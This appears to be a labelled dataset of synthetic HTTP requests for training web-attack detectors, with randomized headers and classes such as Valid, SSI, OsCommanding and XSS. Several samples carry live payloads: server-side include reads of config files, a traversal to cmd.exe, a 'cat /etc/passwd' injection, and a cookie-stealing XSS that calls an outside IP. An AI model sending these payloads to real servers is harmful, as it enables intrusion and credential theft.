Upgrade: O9a1kz/8.8, oleC/5.4, shee/7.3
Warning: 217 7.232.161.211 "en9ruae" 
X-Forwarded-For: 62.14.229.148
X-Serial-Number: 2418413
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21416
Start - Id: 39621
class: SSI
GET /JYHwXA8/adadelDnmmiurU5lTsr7/gdee9yukhmfaes1/e4YIroWnI-42EE/dzHmt0.jpg?dformhavingdocument=ab&nzMsks1eteteet=159359&iojaEhte=styler&usrPO0i=ofnn&o1=%3C%21--%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E&vnhpt5ko=hsgn4prne&7XNqc5M=rqhoaa&lwCtdaazria9ate=shomeaeI&3atrho0este=sxrio8&26vsocwlsxc9=cezEyabsftO&mhin=8va8execeehxhrGw%26jo- HTTP/1.0
Host: www.Cwin.ch
Connection: Rtreoia
Accept: */*
Accept-Charset: cp-950;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 79.170.36.207
Cookie: Tdnormrd2a=qtfx;hntm2=|=o;tEu=jnysteaeSf7irci;iasslombslaosb=se'Z6nty;ain7rWoh=41680
Cookie2: $Version="78"
Date: Fri, 14 Jan 05 09:43:53 GMT
ETag: "JNM4muUx1V.zdKmp.HOl"
Expect: 100-continue
From: nneTpp@ds2o4khd.org
If-Modified-Since: Sat, 10 Nov 07 21:06:16 CET
If-Unmodified-Since: Wed, 06 Aug 08 05:59:41 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Aug 05 13:12:10 CET
Max-Forwards: 2359
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: t7Ca dthiOsnp=enpbG
Authorization: Digest cnonce="qt0mmu"
Range: 973-,-4,32221-
Referer: /ERFl/6nei.pl
TE: deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 8.7; ar-yb; rv:5.6.7) Gecko/86328878
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: 7.3 80.176.58.194
Transfer-Encoding: oraN
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39621
Start - Id: 12762
class: Valid
GET /AdotrFb7O/qdZs3kze@/qtuaietxpastM7cr/zeEsohhbjll/fb5-nUqGgfP8Ib/o.Xqh4SkimgCjL_/eb0n9mitt/ed0raeeIaoe/ESnbAr/nqhKZWabkfX717Kv2EJj/bperwsgie3nhhcb.html?ss=548&C-replaceSw=53573&ol7douaHoot=4aiisorm7Utseho&s44zteSaw3lodt=%5B&nmuGmebces29=spcM8yekO9DA HTTP/1.1
Host: www.owcieft.be
Connection: keep-alive
Accept: video/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 4.223.155.209
Cookie: Bebinoaplfar=sCteanay6mntttye1;nlosaPostxfcey=3407;ngtmpas24q=e0om;SXJsYX@0=uz
Cookie2: $Version="53"
Date: Sat, 23 May 09 14:16:46 CET
ETag: W/"7UpOQ9pxCWpDd78BH5XA"
Expect: 100-continue
From: ahe6lcme@tscunoU.st
If-Modified-Since: Sun, 25 Oct 09 18:45:04 CET
If-Unmodified-Since: Fri, 26 Jan 07 01:03:39 UTC
If-Match: *
If-None-Match: "pmyx4eiG2JybQFD3LH"
If-Range: *
Max-Forwards: 50
MIME-Version: 9.5
Pragma: aste9tr9='edi'
Proxy-Authorization: eqxrte snsH=briit
Authorization: Digest nonce
Range: 23407-76
Referer: /mtIsAj/mtroakl/nhyp/Oagi3/upOsuix.mpg
TE: gzip,deflate,gzip
Trailer: Accept-Encoding
User-Agent: a6sbe/7.5
UA-CPU: MIPS
UA-Disp: 8183,952,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6833x519
Via: hyN/7.2 207.61.16.205
Transfer-Encoding: deflate
Upgrade: DoR/2.1, rahogo/2.6
Warning: 131 201.134.124.106 "nmLen" 
X-Forwarded-For: 98.230.255.210
X-Serial-Number: 29101464435877036
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12762
Start - Id: 32847
class: Valid
POST /eiEwaablsAse.asmx? HTTP/1.0
Content-Length: 191
Content-Language: od
Content-Encoding: deflate
Content-Location: /a25EEIh/le62xu/7aap/itasI1wn.jsp
Content-MD5: c3RzVGRlYVRUYW5xZXNhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Jan 09 13:22:26 CET
Last-Modified: Mon, 26 Jul 04 12:05:21 CET
Host: www.9naadntS.de
Connection: close
Accept: application/*;q=0.3, application/*;q=0.1
Accept-Charset: iso-8859-2;q=0.8, euc-tw, macintosh;q=0.6
Accept-Encoding: compress;q=0.5, deflate;q=0.9, gzip;q=0.2, identity
Accept-Language: sh-hnAnnzl;q=0.9, niftsd-gen, Bebeyu-n;q=0.4, e-ec3dnnt;q=0.4
Cache-Control: max-stale=55
Client-ip: 50.137.205.249
Cookie: hemkf68nin=Ireualawmtz
Cookie2: $Version="7"
Date: Wed, 25 May 05 17:52:24 UTC
ETag: W/"pN2pmfFnSNMmxzKoUH"
Expect: 100-continue
From: 5awfaf@mr4qc.org
If-Modified-Since: Tue, 16 Dec 08 24:22:01 UTC
If-Unmodified-Since: Tue, 27 Mar 07 10:16:48 UTC
If-Match: *
If-None-Match: "wzg-HFWihVl2rc3p"
If-Range: Thu, 30 Apr 09 21:45:35 CET
Max-Forwards: 9
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic N1l0QTY6bnV5bmhnbw==
Authorization: Basic ZWN1M2U6MHRVYmllYWU=
Range: 2086-1,90-
Referer: /vp6a/vIde.exe
TE: chunked,trailers,trailers
Trailer: Connection
User-Agent: t2jLLQX5Q http://www.wrtosE.gov
UA-CPU: StrongARM
UA-Disp: 1558,006,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 968x4170
Via: FTP/6.0 www.aOtuEf.html, pfe/6.5 www.b4olIev.js:6801
Transfer-Encoding: deflate
Upgrade: d8jw0/9.1
Warning: 539 174.52.125.218:7 "gaeepmhroih" 
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

kM6Tps=p&iyhZeiframePZwhereja=hkF.7fu&ap1@3RW=sfE@usntn&3DRPrChpCX=758965476&nullKftpservicesJXautoexecvarED=75697969&Holeaetaeen=lions&idbkthc=033801073&onaaTr=cQBF&Oupaonicyndntt=70779209

End - Id: 32847
Start - Id: 2154
class: Valid
GET /iino1soihrad.jsp?7woeE=230699&ee=yatsO0osiepciE4r&8iobehusre=4eopen+opEc%3Ca%40&gtssfiinesi=narevallatnc%40nehta&caes=eate&tessr=sM9nVR7jt9OO&neiUiNuiqe5=768&nR=%5B%3Fee&nsehAlsttaut=%24eoat-rtwemIa9E&poan7=idl&rE9eelyas=lehamoXrey&ieeqay6ieehmxli=oF28xs.qYr&pUariauw8Ylnfes=6RDuA26ufT&sL9meta=hpvihnom1tvsrg HTTP/1.0
Host: 162.170.152.115
Connection: tidNA
Accept: image/png
Accept-Charset: euc-cn;q=0.5
Accept-Encoding: deflate;q=0.3, deflate, gzip;q=0.6, gzip;q=0.3
Accept-Language: *;q=0.5
Cache-Control: max-stale=21
Client-ip: 94.217.190.139
Cookie: o0Eecroe1mhhltl=26640;nFyweDyAWQ8G=22;R2NWrI=7;fUFBVD5Ppc=6712;eaeqde=ea-W
Cookie2: $Version="400"
Date: Mon, 31 Jan 05 21:44:12 CET
ETag: "zVTEBG174IKsPaqiIzq"
Expect: rcrct25y
From: cwaupt@0tmyctatse.net
If-Modified-Since: Fri, 13 Oct 06 06:31:59 UTC
If-Unmodified-Since: Sun, 01 Mar 09 11:54:12 CET
If-Match: "1c9ptX2A0MCbnFj"
If-None-Match: "Ma_J4I2u0pl1@p9ogP55"
If-Range: Thu, 20 Oct 05 09:16:28 CET
Max-Forwards: 6
MIME-Version: 3.0
Pragma: d='tk'
Proxy-Authorization: Digest nonce
Authorization: 5sscec a9hiolMc=eajn
Range: -5,61-,-809
Referer: /2Moraoo.gif
TE: chunked;q=0.7,trailers,trailers
Trailer: Connection
User-Agent: ebcase (uUx0u_; ecfwO.)
UA-CPU: MIPS
UA-Disp: 5906,5130,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 114x854
Via: 1.0 www.te8vd.html, 3.5 26.68.128.116
Transfer-Encoding: deflate
Upgrade: zienis/1.2, iyetd7/7.3, isE8gA/1.8, ehh9m4/7.8, eeb/5.1
Warning: 722 4.238.114.92 "eaedoiYafssfmr6w" 
X-Forwarded-For: 186.3.114.97
X-Serial-Number: 9895241717803854226
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2154
Start - Id: 43993
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 187.64.13.173
Connection: 82lgLtI
Accept: text/xml;q=0.4, image/*;q=0.5
Accept-Charset: x-mac-cyrillic, utf-8;q=0.7
Accept-Encoding: deflate, gzip
Accept-Language: 4ge-Ton;q=0.7, kss-ygesHhl;q=0.8, htmoer-hqwOiee;q=0.5, meacawp-wsiouT, IeraOfw-ch
Cache-Control: min-fresh=3
Client-ip: 203.23.228.32
Cookie: lictMeO=ns 
Cookie2: $Version="691"
Date: Fri, 01 Jun 07 20:13:54 UTC
ETag: W/"BlghidLOxbzesZLh"
Expect: 5titid9=sseu
From: 44fa@mshrPyo.gov
If-Modified-Since: Fri, 21 Dec 07 21:37:06 GMT
If-Unmodified-Since: Sun, 06 Jan 08 14:36:50 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Aug 08 09:11:38 CET
Max-Forwards: 7214
MIME-Version: 9.9
Pragma: remcbotW='r'
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic aGR5YmlBdzphZG5zb3U=
Range: 29-,-5
Referer: /wsame7b/hhct6h8l/dpteoc/udrye5.gif
TE: trailers
Trailer: Referer
User-Agent: 1seAfdl47h (uZCK0Bao; sVlTIA; efyO_7; dKGXSsm; twEcio1ZF)
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: 5.1 www.trohA2sS.gif, ehd/3.6 250.138.35.59:99, ono4wp/7.1 www.edd8oooe.shtml
Transfer-Encoding: ikai; mnotso=9pei
Upgrade: hri4/0.3, heuue/7.3
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 8515665
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43993
Start - Id: 32221
class: Valid
GET /oveasotnewye4Etsn/543opme23e4iguxca/zS1Z8esx-/nOpmN@5_fc-smamHWM.cfm?t4mcehtowoendh=0s&irN=cloge&3hotmf2eEbf4lih=791184&htohnyrma=119636776&M11t=rqpTZKs&kx=65766311&OflnIsdc0bs=1585nmcds&g1ry70nEcbh2l=2&qhludtn6vnF8a7=%3Fov&vhfuheaomhi=%24&ee=un&ytaV=twindow.opentels HTTP/1.0
Host: 160.215.103.242
Connection: keep-alive
Accept: application/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Noerhht-gaVonrke;q=0.4, nAat-dhui;q=0.5
Cache-Control: enFdeds=f
Client-ip: 20.168.138.91
Cookie: fsmnzngrhrnh=stpenE~$a'?~0a4n
Cookie2: $Version="60"
Date: Fri, 17 Jun 05 04:07:10 GMT
ETag: "pPoR91CtLf54RYXcN"
Expect: 100-continue
From: e26srb@io4s2eeaid.gov
If-Modified-Since: Sun, 04 Apr 04 14:58:23 GMT
If-Unmodified-Since: Fri, 11 Aug 06 03:07:10 CET
If-Match: "R87G4_IAN1RGNwD"
If-None-Match: "1gl_QKzQQTF2Tb@HGG"
If-Range: *
Max-Forwards: 86
MIME-Version: 4.3
Pragma: qOoIc=dlm
Proxy-Authorization: Digest username="udr5p1ia"
Authorization: NTLM RG9yaWVsQXI1YUEzbXFhMjJlZnRuZWludGVsb3Vib25mbXRicUtjcGduUmk=
Range: -31011,02795-
Referer: http://tdnGdlhz.de/gb7e/ilii.htm
TE: chunked,deflate;q=0.2
Trailer: Warning
User-Agent: Mozilla/4.8 (Machintosh; U; PPC 0.6; Ns-en; rv:0.1.9) Gecko/26441920
UA-CPU: 68000
UA-Disp: 210,7088,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0946x4781
Via: HTTP/9.1 180.212.22.162, 4.5 240.18.143.252, 6.6 www.tlysdS.gif
Transfer-Encoding: deflate
Upgrade: rsesd/2.4, wei/5.5
Warning: 498 120.1.39.164 "tiusLw" 
X-Forwarded-For: 204.13.171.9
X-Serial-Number: 76488
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32221
Start - Id: 47476
class: XSS
GET /h3stess/uA3FIgClvrQEuSco7-KD/yan3gu/zurdniL/94AWu@vTiz/oS@/aHtb1vDJreih298I/trxrdnholoaFetCq.pl?euPohnelh4=%3Cdiv++++style%3D+%22++width%3A+++expression%28%5Bwindow.open%28%27http%3A%2F%2F251.117.33.166%2Ftoma.php%27%2Bdocument.cookie%29%3B%5D%29%3B+%22++%3E&JYgJeY3K=stlptnelafsi&jaYyOH=7&rs9=i.FgyQ9RF&jooeqbcho32ma=13279&sI1F9@63=829&tlha3rne=evaltr&NEXwrJaZ_iOx=seD6tisshOiErn HTTP/1.0
Host: www.erkn6.fr:5
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: i-atr5eomf, 0gntetn-eee;q=0.1, r-Nd6rqk
Cache-Control: no-store
Client-ip: 205.71.159.23
Cookie: .-wayEeJJN=ue;Pdjithc=inethprtbodyatK ot6eo;zlasjxtrsi=r;vttlw=lpassthruo;3Waccept6PWD0UzL= cei ti;nd3ebhkddDsa=ea=services<t(
Cookie2: $Version="8"
Date: Sat, 13 Mar 04 03:31:14 GMT
ETag: W/"lWkzjjgEDYcIKD0"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Mon, 12 Dec 05 12:32:05 GMT
If-Unmodified-Since: Fri, 03 Apr 09 18:36:18 UTC
If-Match: "tKj898Y8N3@ZMI5@M8"
If-None-Match: *
If-Range: *
Max-Forwards: 8265
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 1-845224,09-
Referer: /Qtc5dRe.jpg
TE: trailers,trailers
Trailer: If-Match
User-Agent: 8fNMWts http://www.0Iao.org
UA-CPU: StrongARM
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 747x653
Via: FTP/8.2 112.13.42.250
Transfer-Encoding: CNRcI; teee=segcn0ot
Upgrade: rshhh0/1.3
Warning: 687 202.196.135.202:06 "idsvpmhabtisfehmuaet" "Sat, 02 Feb 08 06:06:39 UTC"
X-Forwarded-For: 166.174.206.86
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47476
Start - Id: 11254
class: Valid
GET /nF9sOTNb5/ydEfySih/eBMde/i1HaJ_IBo/aahrotdeeskdu/hv9tCI3e3z-zwohVw/rei/akynakrXzO4byfVO2/fdKTp5/o07xFgv6ths5M/ieuiEionrmeqcw1y/n6TkStGPUJO.H_Xy1n-M.exe?mpforeepetN=erDsiare&tjrtHdss9=067080533&hoplar4ete=hsv&9miitggcHh=35781354&lkouIttB1n=ReozEs&6_6formKiC.v4w=rzttf8mosl&B1FWjf=07343&N.6Wpf0=mmMCJUiCR&mclM=46797 HTTP/1.1
Host: www.ToaO.fr
Connection: racoe
Accept: audio/x-wav, text/*;q=0.9, video/mpeg;q=0.2
Accept-Charset: windows-1257, x-mac-ce, x-mac-cyrillic;q=0.9, iso-2022-kr;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: min-fresh=82213
Client-ip: 49.40.111.24
Cookie: M5cZgroup byt9h.fE=>a;YeZcdm4I@E=saft;fersrg=aytdeighePr;d4RC=49wa4aoHqM8o;HNqvqZ_AqYEphp=na;rtetia2e=sTxz_4nVp_
Cookie2: $Version="475"
Date: Thu, 04 Oct 07 18:46:53 UTC
ETag: "r6cFlT69xgKl84H"
Expect: Einw
From: aarli@mLmeltu.be
If-Modified-Since: Thu, 15 Jul 04 12:58:14 GMT
If-Unmodified-Since: Mon, 02 Nov 09 10:59:56 UTC
If-Match: "JQqgoMb332Y6iffww7LP"
If-None-Match: "rmI-c63HnFsPgx.7DtqS"
If-Range: *
Max-Forwards: 4
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic dE5wcGVlOm9pc3M1Yw==
Authorization: tpjet hwob=9Dg0z
Range: 394051-208299
Referer: http://www.awels7ro.net/1sci.cgi
TE: trailers,trailers,gzip
Trailer: Pragma
User-Agent: nsiN (bR9E9SVH-; tukC_ng; bNZ6t9g; zkAEwu; tqVpHKvlv)
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 234x2210
Via: HTTP/3.3 70.225.221.206, FTP/9.2 www.neadfier.jpeg:3
Transfer-Encoding: compress
Upgrade: ezh/4.9, hQouO/8.3, Ttomi/2.4, iind/9.4, umvntb/3.3
Warning: 582 84.110.116.229 "aokaesAu1ilha" 
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 450563801661696804
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11254
Start - Id: 14950
class: Valid
GET /NZvN2JkpRNxZ/neaojrsDiTEfr.png?3_child33iN=54&Nerwihnvhr=28739206&dle=239562&rhipmOaae=06&nDNLeyn=7&emi8iuvoteeeL=27355044&hee5deya9etmetr=i%2F&oiitoaaE=829539785&tmpAbB8=b2e HTTP/1.0
Host: 88.116.82.186
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.1, x-mac-greek, x-mac-icelandic, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=674
Client-ip: 10.19.142.215
Cookie: bmVdeleten=4teo|;VMbaRpGEa@Yo=5;iyrunat=4tmpima
Cookie2: $Version="3"
Date: Fri, 18 Dec 09 23:42:51 GMT
ETag: "w1TpcF3NlY1w8lWO"
Expect: srnezai8=efakSfn1;grs69mqp
From: hyusCat@gshWelhtl.uk
If-Modified-Since: Sun, 26 Jun 05 24:10:04 GMT
If-Unmodified-Since: Mon, 25 Dec 06 11:33:02 CET
If-Match: *
If-None-Match: *
If-Range: "IKUSSAdMZkdc0Jrnv"
Max-Forwards: 0234
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic cmV0czpzZG51ZXRs
Authorization: Basic YTRobGV1Yjk6bjl4dE5lYQ==
Range: 06-233058
Referer: http://www.Tlkia.net/ornInrd/vaij/wsh3ui/iinas.aspx
TE: trailers,trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/1.3 (X11; U; Linux i386 3.3; aE-rf; rv:7.6.2) Gecko/05780693
UA-CPU: PowerPC
UA-Disp: 2597,7674,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8266x800
Via: 7.6 179.148.94.200, tldsrn/3.9 www.mros9bet.js
Transfer-Encoding: identity
Upgrade: 6rnez3/1.7, ane/0.4, ioia/7.2, nnR/1.8, 7mdu/9.8
Warning: 920 www.4stno.html "3fzsoa8stoh11" "Wed, 04 May 05 04:08:13 GMT"
X-Forwarded-For: 120.240.133.60
X-Serial-Number: 51313390873628125654
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14950
Start - Id: 24971
class: Valid
GET /5uc/Nnartoroizo/l4WnZsaQbWeywBBUl/4nri@J2xY1DM/en0Cok39SDDQpvVqE/nwMo5/ai7t6p/a2vi0fa/mSSJ0e/y6YDca3.cfm?formR2--GBF=nnTemmetaife&rp6lDB.X22KZ=tLCC&Qh8-3kShtacces7.@P=ndu6lxks+reCs1%28seD&wIX1yservicesj=5191859366&hoe6Tncie=eeT&MlibdBFhN9nimg=g&dzf-lS5tSJ3=285536&na94mL=41&ctlpIcTTpad=l&o4itamm4n=e+Eaccept%277+etxtermig%25Etf%5Dstyleth HTTP/1.1
Host: www.irtitNn.be
Connection: close
Accept: video/mpeg;q=0.5
Accept-Charset: iso-8859-8, x-mac-chinesetrad;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 77.220.63.231
Cookie: 4j9UD.E=600001922;tetoi=norkSseohwpj9am;eSedthDeeswse=na1e;ecr9SSodOtrc=wgeti$1ldipnetcate'me/tuad;seohebk=eF3.@5yOX1MU
Cookie2: $Version="930"
Date: Sun, 30 Nov 08 18:57:56 CET
ETag: W/"wCPmHd.PQcW3TRh"
Expect: ciei8=ooG8ng
From: eo5nreal@6phanjveAh.org
If-Modified-Since: Mon, 28 Dec 09 05:35:07 UTC
If-Unmodified-Since: Fri, 11 Jul 08 05:11:38 GMT
If-Match: *
If-None-Match: "rEmsYj6eySlUXlNv"
If-Range: Sat, 21 Jul 07 14:47:33 UTC
Max-Forwards: 3676
MIME-Version: 4.0
Pragma: naa=50ivtsft
Proxy-Authorization: n39Msi agpv8i=to9rstt
Authorization: bEar b2nNc=eooLiebl
Range: 528-04
Referer: /ntnpereR.mdb
TE: gzip;q=0.6
Trailer: If-Range
User-Agent: 3aavtcls
UA-CPU: StrongARM
UA-Disp: 7913,957,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x8766
Via: 4.2 157.135.140.40, HTTP/9.2 www.7hepgv.jpeg:7411
Transfer-Encoding: n3th
Upgrade: hae/6.6, tnaNlo/3.6, ro4r/5.9
Warning: 586 www.xoesS.jpg "tereeuOoER" "Sun, 31 Oct 04 12:03:58 GMT"
X-Forwarded-For: 86.74.11.156
X-Serial-Number: 95297719813252220889
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24971
Start - Id: 40596
class: SSI
GET /rNamilI4pykaCcr/o9ci/zauiiseP/@boot.inip-/AHY4selectQtV7/dta4fcchJos/aXdoXGUCBsy9S4/ajha58tws/tBaXpdwqd0.F2AswkOO/ksSnph-4zbbOstyleF.Ib/4z4lTnwfeexecu2e/6otigt0qmet2soih.exe?styuyss=Bortee%24h3ei0hUC&eoo=90285434&gnetcatmvMadminmR45=oIxGKjbkz4mh&6ulbafawthe=65&stpb=41294689&eIrilkah=%3C%21--+++++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&yS7aobhu2gDl=o&hhsUmtlun=4737&abjaj=78&ido6ioejtrmtaze=pcte7uiii%24&tytoomFe=uemxcnm%25c%7C&RsewuSrNvxaeevl=72&rls5notoUs=ra%24 HTTP/1.1
Host: 83.237.184.170:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: koi8;q=0.5, macintosh;q=0.9, koi8, x-mac-roman;q=0.7
Accept-Encoding: compress;q=0.3, deflate;q=0.5
Accept-Language: ecod-labg;q=0.7, A6i5ials-9hw, hyq4g2t-lss
Cache-Control: der=cwcjMdei
Client-ip: 26.51.86.223
Cookie: tcaps4ihdtee=24628
Cookie2: $Version="83"
Date: Thu, 21 Jul 05 10:40:48 CET
ETag: W/"bb110ijb0AjJQj0"
Expect: 100-continue
From: rboa@y3rzvAlmvo.org
If-Modified-Since: Fri, 14 Oct 05 02:58:11 UTC
If-Unmodified-Since: Thu, 17 Mar 05 20:45:32 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4004
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ekoie
Authorization: Digest response="E77Aea6332dC4Ea1d7Ce3caf337cCAd4"
Range: 67529-
Referer: /ooHeee/dnaonoie/ptXnd/DdR2o1qE.mpeg
TE: gzip;q=0.3
Trailer: Warning
User-Agent: siPn3/6.6.2.5
UA-CPU: StrongARM
UA-Disp: 4510,669,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: HTTP/5.5 227.162.179.69
Transfer-Encoding: identity
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 305 210.240.173.34 "ntioprsmAicmwedcere" "Sat, 11 Dec 04 18:18:56 UTC"
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40596
Start - Id: 28140
class: Valid
GET /LZdC/brsiOiatticaoopp/d-gM61ApUl6uoXSD/rEdeTfnhidi5i/Tt5n3lzt/ev.AUIZZU@xiaJwRCkH/qktelnetQgP5R_oh.php4?QexecYFusrW2=apzknph-1ER&9_V-scriptoptdocument=6isi%3Chtpassea&saEehahIjleemop=15301&9ydlsH=2195737&bir=b%29yFfromo&kajdertJ=gwUb_cz&befsmpvcae3o4=ijk&lnbddmo=e2.AQYyIB&stBn=s%29h8&sh4agtfseonon=shcilx7n&@KEUbbetween2YdF=302783206&R2nJgQe2jB=loehr%27dnkOeucru%25 HTTP/1.1
Host: 45.28.161.224
Connection: keep-alive
Accept: video/*
Accept-Charset: euc-kr
Accept-Encoding: identity
Accept-Language: deav1l-rR, o3bwdlf-0ufytn
Cache-Control: max-age=2
Client-ip: 183.104.243.127
Cookie: mxeeA9ad=n%teecfr;nehet=script;Emoewtcowctls=aFgT;8bz8= astosasgf  ag/0e7
Cookie2: $Version="898"
Date: Sun, 17 Sep 06 15:43:08 UTC
ETag: "UwsaxLfPVhD8eQO"
Expect: 100-continue
From: EcseaglP@o4oECcb.st
If-Modified-Since: Thu, 05 Nov 09 01:30:32 CET
If-Unmodified-Since: Sun, 19 Oct 08 21:42:37 GMT
If-Match: "kMbJ0LCZ9k735bCD"
If-None-Match: *
If-Range: *
Max-Forwards: 444
MIME-Version: 9.2
Pragma: tjn='bltthsel'
Proxy-Authorization: NTLM aDZlbzlMNmNuc20wb2g2cGF0YkF3b3dld2NiTzlub2hldA==
Authorization: nt2rcr ha6yi=ksihiar
Range: 1-,700067-,-09153
Referer: /ia5n6eH.asp
TE: chunked;q=0.5,gzip;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 8.1; re-xe; rv:7.4.0) Gecko/70719417
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4261x691
Via: 7.5 141.34.68.58:1
Transfer-Encoding: deflate
Upgrade: jei/1.9, 4ernhe/9.9
Warning: 821 169.183.205.45 "uorwsi4qi" "Sun, 12 Mar 06 21:00:13 UTC"
X-Forwarded-For: 53.152.98.70
X-Serial-Number: 010005123971864303
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28140
Start - Id: 36694
class: OsCommanding
POST /08/rnUtRmN/renrcykK9ehiistd5N/fY5kz8wBFk1AVp/wjqLh9A/dWIjMVlB1/sX7C5fid78AoYz.php4? HTTP/1.0
Content-Length: 240
Content-Language: cHos
Content-Encoding: identity
Content-Location: http://www.nctetbee.de/HrUtd.png
Content-MD5: eVNzYWloYXV1bmlhcmVlZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Nov 06 03:20:48 GMT
Last-Modified: Mon, 18 Dec 06 04:54:18 CET
Host: www.prckhdt.org
Connection: keep-alive
Accept: text/plain;q=0.6, application/*;q=0.1, text/xml
Accept-Charset: x-mac-arabic, koi8-r;q=0.8, hz-gb-2312;q=0.5, cp-932, windows-1258
Accept-Encoding: 
Accept-Language: *
Client-ip: 131.23.123.221
Cookie: nFowshssre=ehS6frh3;dckEosrarmi9=zooceddn;anaZaadomite=trpis;93in7rpn=fwtHfI
Cookie2: $Version="30"
Date: Sat, 11 Mar 06 10:49:52 GMT
From: eauoy@dBorhtbf9.fr
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Fri, 24 Mar 06 04:52:52 UTC
Max-Forwards: 9355
Authorization: Basic TXpsbmNhYTp0dGFvNGNn
Range: 6660-
Referer: /miad7iiO/su7j/ee6H/srmigief/bwcuoTnd.php
TE: trailers
User-Agent: Mozilla/1.5 (Windows; U; Win98 4.6; so-bo; rv:4.2.3) Gecko/80151307
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 654x545
Via: FTP/4.3 www.nfed.jpeg, 0.4 207.157.93.68, 6.6 221.107.236.159
Transfer-Encoding: identity
----: -------------------------

e0su0ptto=mupdateAe&9sunout4ro=|    cat  /etc/passwd&group byZZyy=mMivshhjze0eosyr&1oeutosh=as&Ym8P=feo1m6&naic8thshrlsue=telnet2h&mAP.YX_@=232576&totoebad=httpourDz&ewlm6rrHmpio5a=9097013&iBpanaNy=4313&afyw=06032790&f.zdivxRE2TA=og39

End - Id: 36694
Start - Id: 39120
class: LdapInjection
PUT /nAr8i/oy.gif? HTTP/1.0
Content-Length: 115
